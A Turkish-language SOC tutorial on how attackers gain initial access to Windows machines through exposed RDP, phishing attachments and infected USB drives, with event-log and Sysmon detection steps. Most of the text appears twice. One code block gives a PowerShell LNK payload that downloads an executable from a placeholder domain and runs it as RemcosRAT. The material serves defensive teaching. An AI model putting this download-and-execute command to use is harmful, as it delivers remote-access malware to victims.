Allah’ın Rahmeti Ve Bereketi Üzerinize Olsun
Selamun aleyküm dostlarım. Bu makalemizde ise Siber saldırganların Windows makinelerine nasıl eriştiğini ve bu makineleri nasıl ihlal ettiğini. Gerçek dünya örnekleri üzerinden yaygın İlk Erişim tekniklerini ve Windows olay günlüklerini kullanarak her tekniği tespit etmeyi inceleyeceğiz Allah’ın izniyle.
İlk Erişim (Initial Access)
Devam etmeden önce, İlk Erişim kavramını tekrar gözden geçirelim. Siber dünyayı, her biri kendi ön kapısıyla korunan gökdelenler ve küçük dairelerle dolu büyük bir şehir gibi hayal edin. Şimdi tehdit aktörlerini geceleri sokaklarda dolaşan suçlular gibi düşünün. Bazıları belirli bir ofisin kilidini haftalarca açmaya çalışır. Bazıları kapıları kaba kuvvetle kırmaya çalışır. Bazıları ise şehirdeki her kapıyı tek tek deneyerek yanlışlıkla açık bırakılmış birini bulmaya çalışır.
Nihai hedef ne olursa olsun, bir tehdit aktörünün ilk adımı içeri girmektir ve bir saldırganın başarılı bir şekilde sisteme girdiği an İlk Erişim (Initial Access) olarak adlandırılır. Bu bölümde çeşitli İlk Erişim yöntemlerini inceleyeceksiniz, ancak şimdilik bunları iki gruba ayıralım: açık bir hizmet gerektirenler ve insan etkileşimine dayananlar.
T1133 / Harici Uzaktan Hizmetler (External Remote Services)
Tehdit aktörleri, makineye uzaktan erişim sağlamak için zayıf parolalara sahip açık RDP/VNC/SSH hizmetlerini arar.
T1190 / Genel Erişime Açık Uygulamayı Sömürme (Exploit Public-Facing Application)
Tehdit aktörleri, yanlış yapılandırılmış veya güvenlik açığı bulunan web sitelerini ve uygulamaları hedef alır.
Aslında, tehdit aktörlerine kendiniz yardım etmediğiniz sürece laptopunuzu enfekte etmek oldukça zordur. Ancak insanlar genellikle kötü amaçlı bağlantılara tıklayarak, oltalama (phishing) eklerini açarak, korsan yazılımlar kullanarak, bilinmeyen USB cihazlarını takarak ve benzeri yollarla tehdit aktörlerine istemeden yardım ederler. Ayrıca insanlar hâlâ siber güvenlikte en zayıf halka olduğu için ve Windows kullanıcı iş istasyonlarında en yaygın işletim sistemi olduğundan, kullanıcı kaynaklı Windows İlk Erişim uyarılarıyla sık sık karşılaşmanız muhtemeldir. Bu yöntemler aşağıdaki MITRE teknikleriyle açıklanmaktadır:
T1566 / Oltalama (Phishing)
Tehdit aktörleri farklı oltalama teknikleri kullanarak kullanıcıları kandırır ve kötü amaçlı yazılımı kendilerinin çalıştırmasını sağlar.
T1091 / Çıkarılabilir Medya (Removable Media)
Tehdit aktörleri bir USB cihazını enfekte eder ve kullanıcıların bu USB’yi birden fazla bilgisayarda kullanmasını umar.
Tehdit Aktörleri Tarafından Kullanım
Bazı İlk Erişim yöntemleri giderek daha popüler hale gelirken, bazıları ise düşüştedir. Modern İlk Erişim eğilimleri hakkında birçok iyi tehdit raporu bulunmaktadır (örneğin, Mandiant M-Trends 2025). Bununla birlikte, bir SOC analisti olarak tehdit aktörlerinin hedefe sızmak için her fırsatı kullanacağını bilmelisiniz. Örneğin, Medusa veya Akira gibi büyük fidye yazılımı grupları, kampanyalarında yukarıda bahsedilen tüm teknikleri en az bir kez kullanmıştır.
RDP üzerinden ilk erişim
Açık RDP’nin Riskleri
Bir SOC analisti olarak, RDP’yi internete açarsanız ve “12345678” gibi zayıf bir parola belirlerseniz, sunucunuzun birkaç gün içinde ele geçirileceğini bilmelisiniz. Ancak herkes açık bir RDP’nin güvenlik risklerini anlamaz. Censys Search verilerine göre şu anda RDP etkin olan 5.000.000’dan fazla makine bulunmaktadır ve bunların birçoğu zaten tehdit aktörlerinin kontrolü altındadır. Sorun o kadar yaygındır ki savunmacılar genellikle RDP’yi “Ransomware Deployment Protocol (Fidye Yazılımı Dağıtım Protokolü)” olarak adlandırır; bu ifade, bir RDP ihlalinin ne kadar sık doğrudan fidye yazılımı saldırısına dönüştüğünü vurgular.
RDP İhlalinin Tespiti
BT yöneticisi RDP’yi bir üretim sunucusunda açmış, böylece hafta sonları evden erişebilmek istemiştir. Kimlik bilgileri Administrator:Summer2025 olarak ayarlanmıştır. Şimdi bundan sonra birkaç saat içinde ne olduğunu yeniden kurgulayalım
Brute Force Loglama
İlginç bir şekilde, yalnızca Security loglarına bakarak bile açık bir RDP’yi tespit etmek çok zor değildir. Eğer sunucunuza bir public IP atar, firewall’u devre dışı bırakır, RDP’yi etkinleştirir ve yaklaşık bir saat beklerseniz — ekran görüntüsündekine benzer loglar görmeye başlarsınız. Dünyanın dört bir yanındaki botnet’ler hemen sunucunuzu brute force ile zorlamaya başlar ve gözden kaçırmayacağınız yüzlerce 4625 eventi üretir!
Ancak şunu unutmayın: Eğer tehdit aktörleri kimlik bilgilerini önceden biliyorsa, brute force yapmadan da RDP üzerinden sisteme sızabilirler
Kimlik Avı Yoluyla İlk Erişim
Phishing’in Güncel Durumu
Phishing saldırıları hâlâ büyük bir tehdittir çünkü RDP erişimini engellemek kadar kolay bir şekilde önlenemezler. Kullanıcıların internete erişimi varsa, er ya da geç kötü amaçlı yazılımları kendi cihazlarına indirir ve firewall’u tamamen atlatırlar. 2025 yılı için yayımlanan HoxHunt Phishing Trends Report’a göre, phishing saldırıları 2022’de ChatGPT’nin çıkışından bu yana 41 kat artmıştır. Dahası, bu kampanyaların başarı oranı hâlâ yüksektir; yani kullanıcılar hâlâ bu saldırılara kanmaktadır. Windows sistem ihlallerine yol açan iki phishing tekniğine odaklanacağız: kötü amaçlı binary dosyalar ve LNK ekleri.
Binary Ekler
Windows’ta birçok çalıştırılabilir dosya uzantısı vardır ve çoğu insan güvenilmeyen .exe dosyalarını açmamayı bilir. Ancak .com, .scr veya .cpl dosyalarına karşı genellikle daha az dikkatli davranırlar. Oysa bu dosyaların hepsi zararlı yazılım içerebilir. Örneğin, kullanıcılar ekli “tryhatme.com” dosyasını kötü amaçlı bir dosya yerine bir toplantı daveti bağlantısı sanarak açmaya daha yatkındır.
Dahası, Windows varsayılan olarak bilinen dosya uzantılarını gizler. Bu da “program.exe” dosyasının kullanıcıya sadece “program” olarak görünmesi anlamına gelir. Tehdit aktörleri bunu sıkça kötüye kullanır; örneğin dosyalarını “invoice.pdf.exe” veya “cat.png.com” gibi isimlendirir ve ikonlarını da konuyla uyumlu olacak şekilde değiştirirler. Aşağıdaki ekran görüntülerine bakarak kötü amaçlı dosyanın sıradan bir kullanıcıya nasıl göründüğünü anlayabilirsiniz:


LNK Ekleri
Antivirüs (AV) tespitinden kaçınmak için tehdit aktörleri, binary dosyalar yerine PowerShell, Visual Basic veya BAT scriptlerini ek olarak göndermeyi tercih edebilir. Bu scriptleri güvenilir gibi göstermek için kullanılan yaygın yöntemlerden biri, onları LNK kısayollarının arkasına gizlemektir — yani masaüstünüzde bulunan ve Program Files klasöründeki gerçek çalıştırılabilir dosyalara işaret eden kısayollar gibi.
Yerel bir bilgisayar mağazasından büyük indirimleri duyuran ve detayları ekli bir arşivde incelemenizi isteyen bir e-posta aldığınızı hayal edin. Aşağıdaki ekran görüntüsünde olduğu gibi, Discounts.zip dosyası iki içerik barındırır: bir PDF ve web sitesine yönlendiren bir kısayol. PDF’yi dikkatlice incelersiniz ve bunun yalnızca güncel indirimleri gösteren bir afiş olduğunu görürsünüz. Haber ilgini çekince, hızlıca kısayolu açarsınız; ancak bunun sizi gerçek web sitesine götürmek yerine bir PowerShell komutuna yönlendirdiğini fark edersiniz.

Tehdit aktörleri, LNK dosyasındaki “Target” (Hedef) alanına istedikleri herhangi bir komutu ekleyebilir ve aynı zamanda kısayol için istedikleri herhangi bir ikonu ayarlayabilir. Bunu doğrulamak için LNK dosyasına sağ tıklayıp “Properties” (Özellikler) seçeneğini seçebilir ve “Shortcut” (Kısayol) sekmesini görüntüleyebilirsiniz.
Örneğin yukarıda gösterilen senaryoda, basitleştirilmiş bir RemcosRAT sürümü indirilip çalıştırılmaktadır — bu zararlı yazılım, büyük şirketler ve devlet kurumlarına yönelik birçok saldırıda kullanılmıştır. Aşağıdaki terminal ise tam bir LNK payload’unu göstermektedir:
Kötü Amaçlı İndirmelerin Tespiti
Eğer kurbanın bunu nasıl gördüğünü biliyorsanız, kötü amaçlı indirmeleri tespit etmek nispeten kolaydır. İlk olarak kullanıcı, bir phishing ekini açmak için bir web tarayıcısı veya masaüstü uygulaması kullanır. En basit senaryoda bu, doğrudan bir .exe zararlı yazılım indirmesi olabilir; ancak çok daha yaygın olarak zararlı yazılım içeren .zip veya .rar gibi bir arşiv dosyasıyla karşılaşırsınız. Bu durumda, Sysmon saldırının her aşamasını tespit etmenize büyük ölçüde yardımcı olabilir.
LNK Ekleri Hakkında Notlar
Binary eklerin aksine, LNK dosyalarının oldukça ilginç ve önemli bir özelliği vardır — çok az çalıştırma izi bırakırlar. Aşağıdaki ekran görüntüsündeki durumu düşünün: Kullanıcı, Google Chrome kısayolu gibi görünen bir LNK dosyasını indirir; ancak gerçekte bu dosya bir PowerShell payload’u çalıştırır.
Kullanıcı kısayolu çalıştırdıktan sonra, Windows Explorer LNK dosyasındaki “Target” (Hedef) alanını okur ve sanki explorer.exe doğrudan PowerShell’i başlatıyormuş gibi görünmesine neden olur. Yine de bunun gerçekten bir LNK phishing saldırısı mı yoksa başka bir saldırı vektörü mü olduğunu anlamak için, öncesindeki dosya oluşturma olaylarına bakabilirsiniz — çünkü LNK dosyalarının daha önce Downloads klasöründe oluşturulmuş olması gerekir.
Çıkarılabilir Medya (USB) Riskleri
Bazıları, enfekte USB belleklerin artık geçmişte kaldığını ve yerlerini tamamen bulut servislerinin aldığını düşünebilir. Ancak Camaro Dragon veya Raspberry Robin gibi saldırılar, tehdit aktörlerinin buna katılmadığını göstermektedir. Ayrıca, enfekte bir USB üzerinden sağlanan Initial Access, phishing’de olduğu gibi firewall’u atlatır ve hatta internet bağlantısı olmadan bile saldırı zincirini başlatabilir ve kullanıcı etkileşimi olmadan yayılmaya devam edebilir.
USB Teslim Senaryosu
Inc.’te çalıştığınızı ve içinde şık bir şapka ile “İK’dan bir hediye” etiketi bulunan bir USB’nin olduğu bir paket aldığınızı hayal edin. USB’yi takarsınız, zararsız görünen bir GIF açılır ve İK’yı arayıp teşekkür edersiniz. Ancak İK ne demek istediğinizi anlamaya çalışırken, USB’deki zararlı yazılım çoktan bilgisayarınıza yayılmıştır. (Gerçek Dünya Senaryosudur)
Yazdırma Hizmeti Senaryosu
Bir diğer yaygın senaryo ise matbaa veya yazdırma hizmeti gibi üçüncü tarafları içerir. Diyelim ki bir yere gidip belge bastırmak için USB’nizi veriyorsunuz. Zaten bir solucanla enfekte olmuş olan sistemleri, zararlı yazılımı USB’nize bulaştırır. Ardından siz bu USB’yi ev bilgisayarınıza takarsınız ve enfeksiyon zinciri devam eder. Şimdi bunun nasıl tespit edileceğini öğrenelim dostlarım.
Enfekte USB’nin Tespiti
USB takıldığı anda zararlı yazılımı otomatik çalıştırmaya yönelik birçok gelişmiş teknik olsa da, vakaların çoğu kullanıcıların zararlı yazılımı kendilerinin çalıştırmasıyla gerçekleşir. Örneğin:

Okuduğunuz için teşekkür ederim
Selamun aleyküm dostlarım. Bu makalemizde ise Siber saldırganların Windows makinelerine nasıl eriştiğini ve bu makineleri nasıl ihlal ettiğini. Gerçek dünya örnekleri üzerinden yaygın İlk Erişim tekniklerini ve Windows olay günlüklerini kullanarak her tekniği tespit etmeyi inceleyeceğiz Allah’ın izniyle.
İlk Erişim (Initial Access)
Devam etmeden önce, İlk Erişim kavramını tekrar gözden geçirelim. Siber dünyayı, her biri kendi ön kapısıyla korunan gökdelenler ve küçük dairelerle dolu büyük bir şehir gibi hayal edin. Şimdi tehdit aktörlerini geceleri sokaklarda dolaşan suçlular gibi düşünün. Bazıları belirli bir ofisin kilidini haftalarca açmaya çalışır. Bazıları kapıları kaba kuvvetle kırmaya çalışır. Bazıları ise şehirdeki her kapıyı tek tek deneyerek yanlışlıkla açık bırakılmış birini bulmaya çalışır.
Nihai hedef ne olursa olsun, bir tehdit aktörünün ilk adımı içeri girmektir ve bir saldırganın başarılı bir şekilde sisteme girdiği an İlk Erişim (Initial Access) olarak adlandırılır. Bu bölümde çeşitli İlk Erişim yöntemlerini inceleyeceksiniz, ancak şimdilik bunları iki gruba ayıralım: açık bir hizmet gerektirenler ve insan etkileşimine dayananlar.
Açık Hizmetler
Bir Windows sunucusunu doğrudan internete açmak, BT ekipleri için yaygın bir iştir — kurumsal web sitelerinin içerik gösterebilmesi için açık bir HTTP portuna, e-posta sunucularının e-posta alıp gönderebilmesi için aktif bir SMTP portuna ve BT yöneticilerinin makineyi uzaktan yönetebilmesi için RDP’ye ihtiyacı vardır. Ancak, açığa çıkarılan her servis ciddi güvenlik riskleri oluşturur. Açığa alınan sisteminiz, dakikalar içinde açık portlar, zayıf parolalar veya yamalanmamış güvenlik açıklarını arayan otomatik botlar tarafından taranabilir. Ve eğer bir şey yeterince iyi korunmamışsa, tehdit aktörleri fırsatı değerlendirirT1133 / Harici Uzaktan Hizmetler (External Remote Services)
Tehdit aktörleri, makineye uzaktan erişim sağlamak için zayıf parolalara sahip açık RDP/VNC/SSH hizmetlerini arar.
T1190 / Genel Erişime Açık Uygulamayı Sömürme (Exploit Public-Facing Application)
Tehdit aktörleri, yanlış yapılandırılmış veya güvenlik açığı bulunan web sitelerini ve uygulamaları hedef alır.
Kullanıcı Odaklı Yöntemler
Ama laptop internete açık değilse nasıl enfekte olabilir?Aslında, tehdit aktörlerine kendiniz yardım etmediğiniz sürece laptopunuzu enfekte etmek oldukça zordur. Ancak insanlar genellikle kötü amaçlı bağlantılara tıklayarak, oltalama (phishing) eklerini açarak, korsan yazılımlar kullanarak, bilinmeyen USB cihazlarını takarak ve benzeri yollarla tehdit aktörlerine istemeden yardım ederler. Ayrıca insanlar hâlâ siber güvenlikte en zayıf halka olduğu için ve Windows kullanıcı iş istasyonlarında en yaygın işletim sistemi olduğundan, kullanıcı kaynaklı Windows İlk Erişim uyarılarıyla sık sık karşılaşmanız muhtemeldir. Bu yöntemler aşağıdaki MITRE teknikleriyle açıklanmaktadır:
T1566 / Oltalama (Phishing)
Tehdit aktörleri farklı oltalama teknikleri kullanarak kullanıcıları kandırır ve kötü amaçlı yazılımı kendilerinin çalıştırmasını sağlar.
T1091 / Çıkarılabilir Medya (Removable Media)
Tehdit aktörleri bir USB cihazını enfekte eder ve kullanıcıların bu USB’yi birden fazla bilgisayarda kullanmasını umar.
Tehdit Aktörleri Tarafından Kullanım
Bazı İlk Erişim yöntemleri giderek daha popüler hale gelirken, bazıları ise düşüştedir. Modern İlk Erişim eğilimleri hakkında birçok iyi tehdit raporu bulunmaktadır (örneğin, Mandiant M-Trends 2025). Bununla birlikte, bir SOC analisti olarak tehdit aktörlerinin hedefe sızmak için her fırsatı kullanacağını bilmelisiniz. Örneğin, Medusa veya Akira gibi büyük fidye yazılımı grupları, kampanyalarında yukarıda bahsedilen tüm teknikleri en az bir kez kullanmıştır.
RDP üzerinden ilk erişim
Açık RDP’nin Riskleri
Bir SOC analisti olarak, RDP’yi internete açarsanız ve “12345678” gibi zayıf bir parola belirlerseniz, sunucunuzun birkaç gün içinde ele geçirileceğini bilmelisiniz. Ancak herkes açık bir RDP’nin güvenlik risklerini anlamaz. Censys Search verilerine göre şu anda RDP etkin olan 5.000.000’dan fazla makine bulunmaktadır ve bunların birçoğu zaten tehdit aktörlerinin kontrolü altındadır. Sorun o kadar yaygındır ki savunmacılar genellikle RDP’yi “Ransomware Deployment Protocol (Fidye Yazılımı Dağıtım Protokolü)” olarak adlandırır; bu ifade, bir RDP ihlalinin ne kadar sık doğrudan fidye yazılımı saldırısına dönüştüğünü vurgular.
RDP İhlalinin Tespiti
BT yöneticisi RDP’yi bir üretim sunucusunda açmış, böylece hafta sonları evden erişebilmek istemiştir. Kimlik bilgileri Administrator:Summer2025 olarak ayarlanmıştır. Şimdi bundan sonra birkaç saat içinde ne olduğunu yeniden kurgulayalım
| Step | Attack | Detection Opportunity |
|---|---|---|
| 1 | Network Scan Botnet IP’mizi tarar ve açık bir RDP portu tespit eder | N/A. Ağ saldırıları bu odanın kapsamı dışındadır |
| 2 | RDP Brute Force Botnet yaygın kullanıcı adlarına (Administrator, admin, support vb.) brute force saldırısı başlatır | 1. Security loglarını aç ve başarısız oturum açmaları filtrele (event ID 4625) 2. Logon type 3 ve 10’u filtrele (uzaktan oturumlar anlamına gelir) 3. Dış IP’lerden gelen girişleri filtrele (“Source IP” alanını kullan) 4. Bu kadar. Olası bir RDP brute force saldırısını tespit ettin |
| 3 | RDP üzerinden Initial Access Yaklaşık 100 denemeden sonra botnet doğru şifreyi tahmin eder ve sisteme giriş yapar | 1. Bir önceki adımdaki listeden devam et 2. Event ID filtresini 4624 (başarılı oturum açmalar) olarak değiştir 3. Oturumun hangi hesap altında açıldığını kontrol et 4. Artık Initial Access için hangi hesabın kullanıldığını biliyorsun |
| 4 | Further Malicious Actions İhlalden iki saat sonra tehdit aktörü RDP ile giriş yapar ve Desktop’u inceler | 1. Bir önceki adımdaki listeden devam et 2. Logon type 10’u filtrele (etkileşimli RDP oturumu) 3. Logon event’inden “Logon ID” alanını kopyala 4. Sysmon loglarını aç ve aynı “Logon ID” ile olayları ara 5. RDP üzerinden tehdit aktörü tarafından başlatılan tüm süreçleri göreceksin |
Brute Force Loglama
İlginç bir şekilde, yalnızca Security loglarına bakarak bile açık bir RDP’yi tespit etmek çok zor değildir. Eğer sunucunuza bir public IP atar, firewall’u devre dışı bırakır, RDP’yi etkinleştirir ve yaklaşık bir saat beklerseniz — ekran görüntüsündekine benzer loglar görmeye başlarsınız. Dünyanın dört bir yanındaki botnet’ler hemen sunucunuzu brute force ile zorlamaya başlar ve gözden kaçırmayacağınız yüzlerce 4625 eventi üretir!
Ancak şunu unutmayın: Eğer tehdit aktörleri kimlik bilgilerini önceden biliyorsa, brute force yapmadan da RDP üzerinden sisteme sızabilirler
Kimlik Avı Yoluyla İlk Erişim
Phishing’in Güncel Durumu
Phishing saldırıları hâlâ büyük bir tehdittir çünkü RDP erişimini engellemek kadar kolay bir şekilde önlenemezler. Kullanıcıların internete erişimi varsa, er ya da geç kötü amaçlı yazılımları kendi cihazlarına indirir ve firewall’u tamamen atlatırlar. 2025 yılı için yayımlanan HoxHunt Phishing Trends Report’a göre, phishing saldırıları 2022’de ChatGPT’nin çıkışından bu yana 41 kat artmıştır. Dahası, bu kampanyaların başarı oranı hâlâ yüksektir; yani kullanıcılar hâlâ bu saldırılara kanmaktadır. Windows sistem ihlallerine yol açan iki phishing tekniğine odaklanacağız: kötü amaçlı binary dosyalar ve LNK ekleri.
Binary Ekler
Windows’ta birçok çalıştırılabilir dosya uzantısı vardır ve çoğu insan güvenilmeyen .exe dosyalarını açmamayı bilir. Ancak .com, .scr veya .cpl dosyalarına karşı genellikle daha az dikkatli davranırlar. Oysa bu dosyaların hepsi zararlı yazılım içerebilir. Örneğin, kullanıcılar ekli “tryhatme.com” dosyasını kötü amaçlı bir dosya yerine bir toplantı daveti bağlantısı sanarak açmaya daha yatkındır.
Dahası, Windows varsayılan olarak bilinen dosya uzantılarını gizler. Bu da “program.exe” dosyasının kullanıcıya sadece “program” olarak görünmesi anlamına gelir. Tehdit aktörleri bunu sıkça kötüye kullanır; örneğin dosyalarını “invoice.pdf.exe” veya “cat.png.com” gibi isimlendirir ve ikonlarını da konuyla uyumlu olacak şekilde değiştirirler. Aşağıdaki ekran görüntülerine bakarak kötü amaçlı dosyanın sıradan bir kullanıcıya nasıl göründüğünü anlayabilirsiniz:


LNK Ekleri
Antivirüs (AV) tespitinden kaçınmak için tehdit aktörleri, binary dosyalar yerine PowerShell, Visual Basic veya BAT scriptlerini ek olarak göndermeyi tercih edebilir. Bu scriptleri güvenilir gibi göstermek için kullanılan yaygın yöntemlerden biri, onları LNK kısayollarının arkasına gizlemektir — yani masaüstünüzde bulunan ve Program Files klasöründeki gerçek çalıştırılabilir dosyalara işaret eden kısayollar gibi.
Yerel bir bilgisayar mağazasından büyük indirimleri duyuran ve detayları ekli bir arşivde incelemenizi isteyen bir e-posta aldığınızı hayal edin. Aşağıdaki ekran görüntüsünde olduğu gibi, Discounts.zip dosyası iki içerik barındırır: bir PDF ve web sitesine yönlendiren bir kısayol. PDF’yi dikkatlice incelersiniz ve bunun yalnızca güncel indirimleri gösteren bir afiş olduğunu görürsünüz. Haber ilgini çekince, hızlıca kısayolu açarsınız; ancak bunun sizi gerçek web sitesine götürmek yerine bir PowerShell komutuna yönlendirdiğini fark edersiniz.

Tehdit aktörleri, LNK dosyasındaki “Target” (Hedef) alanına istedikleri herhangi bir komutu ekleyebilir ve aynı zamanda kısayol için istedikleri herhangi bir ikonu ayarlayabilir. Bunu doğrulamak için LNK dosyasına sağ tıklayıp “Properties” (Özellikler) seçeneğini seçebilir ve “Shortcut” (Kısayol) sekmesini görüntüleyebilirsiniz.
Örneğin yukarıda gösterilen senaryoda, basitleştirilmiş bir RemcosRAT sürümü indirilip çalıştırılmaktadır — bu zararlı yazılım, büyük şirketler ve devlet kurumlarına yönelik birçok saldırıda kullanılmıştır. Aşağıdaki terminal ise tam bir LNK payload’unu göstermektedir:
Kod:
powershell.exe -c ...
# Download the encoded malware
(New-object System.Net.WebClient).DownloadFile('https://breacheddomain.thm/FILTERED/r.exe','C:\\ProgramData\\r.exe');
# Run the malware (RemcosRAT)
start C:\\ProgramData\\r.exe;
Kötü Amaçlı İndirmelerin Tespiti
Eğer kurbanın bunu nasıl gördüğünü biliyorsanız, kötü amaçlı indirmeleri tespit etmek nispeten kolaydır. İlk olarak kullanıcı, bir phishing ekini açmak için bir web tarayıcısı veya masaüstü uygulaması kullanır. En basit senaryoda bu, doğrudan bir .exe zararlı yazılım indirmesi olabilir; ancak çok daha yaygın olarak zararlı yazılım içeren .zip veya .rar gibi bir arşiv dosyasıyla karşılaşırsınız. Bu durumda, Sysmon saldırının her aşamasını tespit etmenize büyük ölçüde yardımcı olabilir.
Kod:
# 1. Sysmon Olay Kimliği 1: Web tarayıcısı başlatıldı
Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
ParentImage: C:\Windows\Explorer.EXE
# 2. Sysmon Olay Kimliği 11: İndirilenler klasöründe bir dosya (genellikle arşiv) belirdi.
Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
TargetFilename: C:\Users\User\Downloads\invoice.zip*
# 3. Sysmon Olay Kimliği 11: Kullanıcı isteğe bağlı olarak dosyaları bir klasöre arşivden çıkarıyor.
Image: C:\Windows\Explorer.EXE (or C:\Program Files\7-Zip\7zG.exe)
TargetFilename: C:\Users\User\Downloads\invoice.pdf.exe
# 4. Sysmon Olay Kimliği 1: Kullanıcı arşivden çıkarılmış dosyaya çift tıklıyor.
Image: C:\Users\User\Downloads\invoice.pdf.exe
ParentImage: C:\Windows\Explorer.EXE
Binary eklerin aksine, LNK dosyalarının oldukça ilginç ve önemli bir özelliği vardır — çok az çalıştırma izi bırakırlar. Aşağıdaki ekran görüntüsündeki durumu düşünün: Kullanıcı, Google Chrome kısayolu gibi görünen bir LNK dosyasını indirir; ancak gerçekte bu dosya bir PowerShell payload’u çalıştırır.
Kullanıcı kısayolu çalıştırdıktan sonra, Windows Explorer LNK dosyasındaki “Target” (Hedef) alanını okur ve sanki explorer.exe doğrudan PowerShell’i başlatıyormuş gibi görünmesine neden olur. Yine de bunun gerçekten bir LNK phishing saldırısı mı yoksa başka bir saldırı vektörü mü olduğunu anlamak için, öncesindeki dosya oluşturma olaylarına bakabilirsiniz — çünkü LNK dosyalarının daha önce Downloads klasöründe oluşturulmuş olması gerekir.
Çıkarılabilir Medya (USB) Riskleri
Bazıları, enfekte USB belleklerin artık geçmişte kaldığını ve yerlerini tamamen bulut servislerinin aldığını düşünebilir. Ancak Camaro Dragon veya Raspberry Robin gibi saldırılar, tehdit aktörlerinin buna katılmadığını göstermektedir. Ayrıca, enfekte bir USB üzerinden sağlanan Initial Access, phishing’de olduğu gibi firewall’u atlatır ve hatta internet bağlantısı olmadan bile saldırı zincirini başlatabilir ve kullanıcı etkileşimi olmadan yayılmaya devam edebilir.
USB Teslim Senaryosu
Inc.’te çalıştığınızı ve içinde şık bir şapka ile “İK’dan bir hediye” etiketi bulunan bir USB’nin olduğu bir paket aldığınızı hayal edin. USB’yi takarsınız, zararsız görünen bir GIF açılır ve İK’yı arayıp teşekkür edersiniz. Ancak İK ne demek istediğinizi anlamaya çalışırken, USB’deki zararlı yazılım çoktan bilgisayarınıza yayılmıştır. (Gerçek Dünya Senaryosudur)
Yazdırma Hizmeti Senaryosu
Bir diğer yaygın senaryo ise matbaa veya yazdırma hizmeti gibi üçüncü tarafları içerir. Diyelim ki bir yere gidip belge bastırmak için USB’nizi veriyorsunuz. Zaten bir solucanla enfekte olmuş olan sistemleri, zararlı yazılımı USB’nize bulaştırır. Ardından siz bu USB’yi ev bilgisayarınıza takarsınız ve enfeksiyon zinciri devam eder. Şimdi bunun nasıl tespit edileceğini öğrenelim dostlarım.
Enfekte USB’nin Tespiti
USB takıldığı anda zararlı yazılımı otomatik çalıştırmaya yönelik birçok gelişmiş teknik olsa da, vakaların çoğu kullanıcıların zararlı yazılımı kendilerinin çalıştırmasıyla gerçekleşir. Örneğin:
- Zararlı yazılım, USB’deki tüm gerçek dosyaları gizler ve yerine kötü amaçlı bir “RECOVERY.lnk” dosyası oluşturur
- Zararlı yazılım, “Photos.exe” adlı bir dosya oluşturur ve ikonunu normal bir klasör gibi gösterir
- Zararlı yazılım, “photo_2024_1_12.jpg.exe” gibi çift uzantılı dosyalar oluşturur

Okuduğunuz için teşekkür ederim












